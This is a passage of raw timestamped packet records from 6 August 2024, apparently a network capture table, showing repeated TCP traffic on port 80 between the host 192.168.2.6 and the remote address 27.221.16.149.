                                                                                                                                    Aug 6, 2024 10:29:50.820965052 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.820975065 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.820986032 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821007013 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:50.821031094 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:50.821568966 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821688890 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821698904 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821713924 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821723938 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821729898 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:50.821734905 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821747065 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821748018 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:50.821773052 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:50.821815014 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821825027 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821830034 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821835041 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821841002 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:50.821929932 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.164273977 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.164299965 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.164313078 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.164324045 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.164336920 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.164346933 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.164362907 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.164429903 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.164938927 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.164978027 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165010929 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165021896 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165029049 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165059090 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165093899 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165107012 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165117979 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165146112 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165154934 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165165901 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165175915 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165191889 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165287971 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165339947 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165354013 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165365934 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165410995 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165432930 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165446043 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165477991 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165574074 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165616035 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165620089 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165633917 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165651083 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165662050 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165677071 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165697098 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165708065 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.165712118 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165766001 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.165985107 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166016102 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166028023 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166058064 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.166083097 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166095018 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166106939 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166129112 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.166140079 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.166169882 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166182041 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166193008 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166204929 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166232109 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.166261911 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166266918 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.166273117 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166305065 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166315079 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166328907 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.166354895 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.166750908 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166810989 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166822910 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166834116 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166843891 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.166858912 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.166878939 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.478641987 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.478667021 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.478678942 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.478689909 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.478703022 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.478761911 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.479141951 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479152918 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479163885 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479192019 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.479224920 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.479231119 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479243040 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479260921 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479271889 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479296923 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.479321957 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.479391098 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479410887 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479420900 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479445934 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.479520082 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479532003 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479542971 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479554892 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479562998 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.479590893 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.479821920 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479832888 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479846001 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479867935 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.479881048 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479887962 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.479895115 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479907036 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.479944944 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.480050087 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480067968 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480077982 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480084896 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.480092049 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480104923 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480113983 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.480117083 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480130911 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480137110 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.480140924 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480153084 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480163097 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480174065 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480182886 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.480209112 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.480736017 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480771065 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480782032 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480807066 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.480849028 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480859995 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480871916 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480884075 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480885029 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.480912924 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.480942965 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480952978 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480964899 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480974913 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.480977058 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.481004000 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.520596981 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.817080021 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.817101002 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.817112923 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.817123890 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.817136049 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.817147017 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.817409039 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818342924 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818375111 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818384886 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818429947 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818440914 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818445921 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818454981 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818466902 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818470001 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818505049 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818507910 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818517923 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818528891 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818540096 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818558931 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818572044 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818587065 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818598032 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818608999 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818623066 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818650007 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818723917 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818734884 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818744898 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818756104 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818766117 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818769932 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818778992 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818790913 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.818792105 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818830967 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.818973064 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819040060 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819050074 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819061995 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819094896 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.819106102 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819117069 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819128036 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819139004 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819152117 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.819175959 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.819331884 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819377899 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.819488049 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819499969 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819510937 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819520950 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819531918 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819546938 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.819576979 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.819915056 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819926977 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819936991 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819947958 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819958925 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819962978 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.819972038 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.819977999 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.819997072 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.820085049 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.820096970 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.820106983 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.820118904 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:51.820123911 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:51.820152044 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.162308931 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.162334919 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.162350893 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.162365913 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.162381887 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.162437916 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.163363934 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163382053 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163398981 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163414001 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163422108 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.163435936 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.163490057 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163507938 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163525105 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163535118 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.163556099 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.163638115 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163655043 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163670063 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163686037 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163692951 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.163702011 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163714886 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.163809061 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163846016 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163851976 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.163865089 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163882971 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163901091 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163906097 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.163918972 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163938046 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.163938999 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.163985014 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.164443970 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.164463043 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.164494038 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.164535046 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.164599895 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.164619923 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.164637089 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.164649963 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.164654970 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.164674044 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.164679050 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.164694071 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.164719105 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.165100098 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165117025 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165134907 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165160894 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165163040 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.165179014 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165195942 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165201902 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.165213108 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.165218115 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165240049 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165256023 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.165256023 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165277004 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165293932 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165302038 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.165313959 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165332079 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165345907 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.165373087 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.165385962 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165586948 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165604115 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165621042 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:52.165635109 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:52.165668011 CEST4975180192.168.2.627.221.16.149
